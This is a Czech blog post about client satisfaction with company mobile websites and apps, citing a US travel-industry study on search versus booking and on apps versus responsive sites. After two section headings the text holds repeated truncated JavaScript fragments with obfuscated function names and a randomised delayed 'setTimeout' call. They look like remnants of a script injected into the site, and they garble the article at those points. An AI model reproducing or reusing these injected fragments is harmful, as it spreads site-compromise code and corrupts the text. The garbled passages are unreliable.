0

Proč je důležité znát spokojenost klientů s firemní mobilní prezentací?

Kategorie: Mobilní weby a vše okolo

Představte si, že právě vybíráte dovolenou pro svou rodinu. Nejspíš se podíváte na internet a podle situace vystřídáte počítač a mobil / nebo tablet, pak se podíváte do katalogu, který vám přišel do poštovní schránky. Možná se dokonce cestou z práce zastavíte přímo v pobočce některé z cestovních kanceláří. Ve všech případech očekáváte 100% spolehlivost, funkčnost, relevantnost. Jako zákazník vůbec neuvažujete nad tím, že jste využili různé „komunikační kanály“ (web vs. pobočka), ale chcete, aby se tyto kanály dokonale doplňovaly.

Spokojenost zákazníků s jednotlivými kanály zkoumají každoročně různé studie. Já bych vám ráda přiblížila pár faktů ze studie, která se zaměřila na spokojenost zákazníků s mobilními weby a aplikacemi z oblasti cestovního ruchu v USA.

 Spokojenost klientů s mobilními weby či aplikacemi je důležitější, než si možná myslíte. Lidé své chytré telefony používají doma, venku, v práci, na letišti, v hotelech a to, jak se vaše firma prezentuje přes mobil, vám může zákazníky buďto přihrát a nebo odradit.

Hledání vs. Rezervaceandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Studie ukazuje, že více lidí se připojuje na mobilní webové stránky a aplikace z domu (71%) a z práce (13%), než z venku (12%). To se ale bude postupně měnit společně s tím, jak se připojování na internet přes mobil stane běžnější.

Více lidí se připojuje na firemní mobilní stránky a/nebo aplikace za účelem vyhledávání 43%, zatímco rezervaci přes mobil provádí 23% klientů. Spokojenost klientů s mobilními weby / aplikacemi při vyhledávání je téměř srovnatelná se spokojeností při online rezervacích přes mobilní web / aplikaci.

Mnoho mobilních webů a aplikací jsou navrženy tak, aby klientům co nejvíce zjednodušili a zpříjemnili nákup či rezervaci služeb/produktů. Avšak téměř polovina návštěvníků na firemních stránkách nebo v aplikaci hledá „jen“ informace, které jim pomohou v dalším plánování. To je důležité vědět, pokud jste právě ve fázi navrhování mobilního webu či aplikace. Zkuste implementovat funkce, které klientům pomohou právě v plánování, jako třeba ukládání výsledků vyhledávání, ukládání navržených itinerářů, přímý (a funkční!) kontakt k oslovení mailem / telefonem. Divili byste se, kolik firem stále ještě uvádí na svých stránkách telefonní číslo ve formátu, ve kterém není možné číslo okamžitě vytočit.

Aplikace vs. Mobilní stránkyandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Mezi těmi, kteří se studie zúčastnili, bylo 70% uživatelů mobilních webu a 30% uživatelů aplikací. Aplikace zaznamenaly pouze o jeden bod vyšší satisfakci než mobilní weby (78 vs. 77). To naznačuje, že tvůrci aplikací mají spoustu prostoru pro zlepšení a také to, že zkušenost s aplikacemi uživatelé zřejmě nevnímají až tak pozitivně, jak by se mohlo zdát. 36% respondentů uvedlo, že použilo mobilní aplikaci proto, že byla jednodušeji použitelná než mobilní web, 23% tvrdilo, že aplikace byla rychlejší a 20% nechce používat mobilní web, pokud mají na výběr mezi mobilním webem a aplikací.

Hlavním důvodem, proč dotázaní nepoužili mobilní aplikaci, je, že ji prostě neměli v mobilu. 51% respondentů aplikaci nestáhlo a 22% nevědělo o její existenci. Toto zjištění podporuje tvorbu webových stránek optimalizovaných pro mobil při využití responsivního designu. Uživatelé nemusí žádnou aplikaci stahovat a vaše firma nemusí vynakládat náklady na propagaci aplikace mezi desítkami či stovkami podobných aplikací.

Pokud už se vám ale podaří vytvořit prvotřídní aplikaci a dokážete přimět uživatele, aby si ji stáhli, dosáhnete určité stupně loajálnosti mezi nimi a vaší společností.

Tweet about this on TwitterShare on FacebookEmail this to someone
lospapunos@seznam.cz'

Komentáře

Loading Facebook Comments ...

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

20 − 8 =